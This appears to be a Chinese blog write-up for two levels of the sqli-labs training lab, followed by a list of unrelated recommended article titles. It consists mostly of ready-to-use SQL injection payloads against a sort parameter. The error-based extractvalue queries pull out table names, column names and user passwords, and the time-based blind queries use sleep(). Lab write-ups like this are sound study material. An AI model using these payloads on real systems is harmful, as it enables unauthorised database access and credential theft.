当前位置:网站首页>SQL注入 Less47(报错注入) 和Less49(时间盲注)
SQL注入 Less47(报错注入) 和Less49(时间盲注)
2022-07-31 02:27:00 【开心星人】
Less47和Less49都用不了rand()布尔盲注
因为有单引号闭合order by 'rand()' 这条语句显然是执行不了的
Less47
?sort=1' and extractvalue(0,concat(0x7e,database()))--+
?sort=1' and extractvalue(0,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="security")))--+
?sort=1' and extractvalue(0,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users")))--+
?sort=1' and extractvalue(0,concat(0x7e, (select group_concat(username,password) from users)))--+
Less49
?sort=1' and sleep(5)--+
?sort=1' and if(1,sleep(5),0)--+
?sort=1' and if(length(database())=8,sleep(5),0)--+
?sort=1' and if(ascii(substr(database(),1,1))=115,sleep(5),0)--+
?sort=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101,sleep(5),0)--+
?sort=1' and if(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1)='i',sleep(5),0)--+
?sort=1' and if(ascii(substr((select username from users limit 0,1),1,1))=68,sleep(5),0)--+
边栏推荐
- Intel's software and hardware optimization empowers Neusoft to accelerate the arrival of the era of smart medical care
- 【AcWing 第62场周赛】
- Basic introduction to ShardingJDBC
- 项目开发软件目录结构规范
- CV-Model [3]: MobileNet v2
- First acquaintance with C language -- array
- leetcode-128: longest continuous sequence
- 【shell基础】判断目录是否为空
- Arbitrum 专访 | L2 Summer, 脱颖而出的 Arbitrum 为开发者带来了什么?
- 医疗影像领域AI软件开发流程
猜你喜欢

19.支持向量机-优化目标和大间距直观理解

MPPT solar charge controller data collection - through the gateway acquisition capacity battery SOC battery voltage, wi-fi

Static routing + PAT + static NAT (explanation + experiment)

公司官网建站笔记(六):域名进行公安备案并将备案号显示在网页底部

tcp框架需要解决的问题

mmdetection训练一个模型相关命令

直播预告 | KDD2022博士论文奖冠亚军对话

StringJoiner详解

Intel's software and hardware optimization empowers Neusoft to accelerate the arrival of the era of smart medical care

vlan间路由+静态路由+NAT(PAT+静态NAT)综合实验
随机推荐
二层广播风暴(产生原因+判断+解决)
multiplayer-hlap 包有问题,无法升级的解决方案
f.grid_sample
直播预告 | KDD2022博士论文奖冠亚军对话
Gateway routing configuration
Teach you how to configure Jenkins automated email notifications
12 pictures take you to fully understand service current limit, circuit breaker, downgrade, and avalanche
Drools基本介绍,入门案例,基本语法
Charging effect simulation
The difference between link and @import
Tower of Hanoi problem
The application of AI in the whole process of medical imaging equipment
医疗影像领域AI软件开发流程
Brute Force/Adjacency Matrix Breadth First Directed Weighted Graph Undirected Weighted Graph
What are the project management tools like MS Project
General introduction to the Unity interface
Intranet Infiltration - Privilege Escalation
What have I experienced to become a tester who is harder than development?
图像处理技术的心酸史
Basic introduction to ShardingJDBC